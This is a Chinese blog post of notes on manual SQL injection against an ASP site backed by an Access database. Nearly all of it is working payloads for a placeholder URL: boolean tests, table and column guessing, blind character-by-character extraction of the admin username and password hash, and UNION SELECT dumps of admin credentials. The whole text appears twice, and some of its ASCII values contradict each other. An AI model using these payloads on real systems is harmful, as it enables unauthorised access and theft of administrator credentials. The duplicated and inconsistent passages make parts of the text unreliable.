access手工注入笔记
2012-07-23 08:28
507 查看
http://www.xxx.com/news.asp?id=6
注入点
判断是否存在注入 两次返回不一样 存在注入
http://www.xxx.com/news.asp?id=6
and 1=1
http://www.xxx.com/news.asp?id=6
and 1=2
判断数据库 这里可能是本地问题 没有测试出来
and (select count(*) from msysobjects)>0 (返回权限不足access数据库)
and (select count(*) from sysobjects)>0 (返回正常则为MSSQL数据库)
猜解表名(正常则存在admin,不正常则不存在)
and exists (select * from admin)
返回正确 存在admin 我们随便填写一个进去那么 返回错误 不存在这个表
现在我们来猜解字段
and exists (select username from admin)
and exists (select password from admin)
没有出错证明这两个字段都是存在 不存在的话同上 不存在字段
猜解用户名和密码长度
and (select top 1 len(username) from admin)>0
and (select top 1 len(password) from admin)>0
猜解用户名和密码内容:
and(select top 1 asc(mid(username,1,1))from admin)>97
and(select top 1 asc(mid(username,1,1))from admin)=97
and(select top 1 asc(mid(username,2,1))from admin)=100
and(select top 1 asc(mid(username,3,1))from admin)=109
and(select top 1 asc(mid(username,4,1))from admin)=105
and(select top 1 asc(mid(username,5,1))from admin)=110
97 100 109 105 110 admin
------------------------------------------------------
and(select top 1 asc(mid(password,1,1))from admin)=52
and(select top 1 asc(mid(password,2,1))from admin)=54
and(select top 1 asc(mid(password,3,1))from admin)=57
and(select top 1 asc(mid(password,4,1))from admin)=56
and(select top 1 asc(mid(password,5,1))from admin)=48
and(select top 1 asc(mid(password,6,1))from admin)=100
and(select top 1 asc(mid(password,7,1))from admin)=51
and(select top 1 asc(mid(password,8,1))from admin)=50
and(select top 1 asc(mid(password,9,1))from admin)=99
and(select top 1 asc(mid(password,10,1))from admin)=48
and(select top 1 asc(mid(password,11,1))from admin)=53
and(select top 1 asc(mid(password,12,1))from admin)=53
and(select top 1 asc(mid(password,13,1))from admin)=57
and(select top 1 asc(mid(password,14,1))from admin)=102
and(select top 1 asc(mid(password,15,1))from admin)=56
and(select top 1 asc(mid(password,16,1))from admin)=32
52 54 57 101 56 48 100 51 50 99 48 53 53 57 102 56 32
469e80d32c0559f8 md5 解出来的密码是admin888
=====================================================
(二)联合查询暴出管理帐号及密码
先用order by 爆出字段数,然后:
http://www.xxx.com/news.asp?id=6
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin
语法:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 表示的是列长度。
from admin 查询对像admin表名
运行后会出现两到三个数字,如:4、12 则修改语句子(即在4、12中修改成列名,红色部份):
http://www.xxx.com/news.asp?id=6
and 1=2 union select 1,2,3,usermane,5,6,7,8,9,10,11,password,13,14,15 from admin
这样,就可以爆出管理帐户和密码了。当然你也可以先爆帐户:
http://www.xxx.com/news.asp?id=6
and 1=2 union select 1,2,3,username,5,6,7,8,9,10,11,12,13,14,15 from admin
再爆密码:
http://www.xxx.com/news.asp?id=6
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,password,15 from admin
注入点
判断是否存在注入 两次返回不一样 存在注入
http://www.xxx.com/news.asp?id=6
and 1=1
http://www.xxx.com/news.asp?id=6
and 1=2
判断数据库 这里可能是本地问题 没有测试出来
and (select count(*) from msysobjects)>0 (返回权限不足access数据库)
and (select count(*) from sysobjects)>0 (返回正常则为MSSQL数据库)
猜解表名(正常则存在admin,不正常则不存在)
and exists (select * from admin)
返回正确 存在admin 我们随便填写一个进去那么 返回错误 不存在这个表
现在我们来猜解字段
and exists (select username from admin)
and exists (select password from admin)
没有出错证明这两个字段都是存在 不存在的话同上 不存在字段
猜解用户名和密码长度
and (select top 1 len(username) from admin)>0
and (select top 1 len(password) from admin)>0
猜解用户名和密码内容:
and(select top 1 asc(mid(username,1,1))from admin)>97
and(select top 1 asc(mid(username,1,1))from admin)=97
and(select top 1 asc(mid(username,2,1))from admin)=100
and(select top 1 asc(mid(username,3,1))from admin)=109
and(select top 1 asc(mid(username,4,1))from admin)=105
and(select top 1 asc(mid(username,5,1))from admin)=110
97 100 109 105 110 admin
------------------------------------------------------
and(select top 1 asc(mid(password,1,1))from admin)=52
and(select top 1 asc(mid(password,2,1))from admin)=54
and(select top 1 asc(mid(password,3,1))from admin)=57
and(select top 1 asc(mid(password,4,1))from admin)=56
and(select top 1 asc(mid(password,5,1))from admin)=48
and(select top 1 asc(mid(password,6,1))from admin)=100
and(select top 1 asc(mid(password,7,1))from admin)=51
and(select top 1 asc(mid(password,8,1))from admin)=50
and(select top 1 asc(mid(password,9,1))from admin)=99
and(select top 1 asc(mid(password,10,1))from admin)=48
and(select top 1 asc(mid(password,11,1))from admin)=53
and(select top 1 asc(mid(password,12,1))from admin)=53
and(select top 1 asc(mid(password,13,1))from admin)=57
and(select top 1 asc(mid(password,14,1))from admin)=102
and(select top 1 asc(mid(password,15,1))from admin)=56
and(select top 1 asc(mid(password,16,1))from admin)=32
52 54 57 101 56 48 100 51 50 99 48 53 53 57 102 56 32
469e80d32c0559f8 md5 解出来的密码是admin888
=====================================================
(二)联合查询暴出管理帐号及密码
先用order by 爆出字段数,然后:
http://www.xxx.com/news.asp?id=6
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin
语法:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 表示的是列长度。
from admin 查询对像admin表名
运行后会出现两到三个数字,如:4、12 则修改语句子(即在4、12中修改成列名,红色部份):
http://www.xxx.com/news.asp?id=6
and 1=2 union select 1,2,3,usermane,5,6,7,8,9,10,11,password,13,14,15 from admin
这样,就可以爆出管理帐户和密码了。当然你也可以先爆帐户:
http://www.xxx.com/news.asp?id=6
and 1=2 union select 1,2,3,username,5,6,7,8,9,10,11,12,13,14,15 from admin
再爆密码:
http://www.xxx.com/news.asp?id=6
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,password,15 from admin
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- ACCESS手工注入学习笔记
- 1.羽翼sqlmap学习笔记之Access注入
- ACCESS 手工注入
- 手工ACCESS注入方法
- access手工注入
- 学习笔记 MSSQL显错手工注入
- access基本手工注入
- php手工注入笔记
- 我的学习笔记(SQL简单的注入)(1) 手工注入以及注入一些常用语句
- SQL server手工注入学习笔记
- ASP+acc手工注入
- 学习笔记五-sql之access和mssql注入
- Spring实战(第4版) Spring Inaction 笔记(第一章)依赖注入和AOP
- spring依赖注入之手工装配
- Mini 容器学习笔记8——字段注入
- Spring学习笔记(6)——IoC的三种注入方式
- spring学习笔记(六)-----数据源的注入
- 微软企业库4.1学习笔记(二十四)Unity依赖注入模块 简介
- 手工注入
- Mssql高级注入笔记II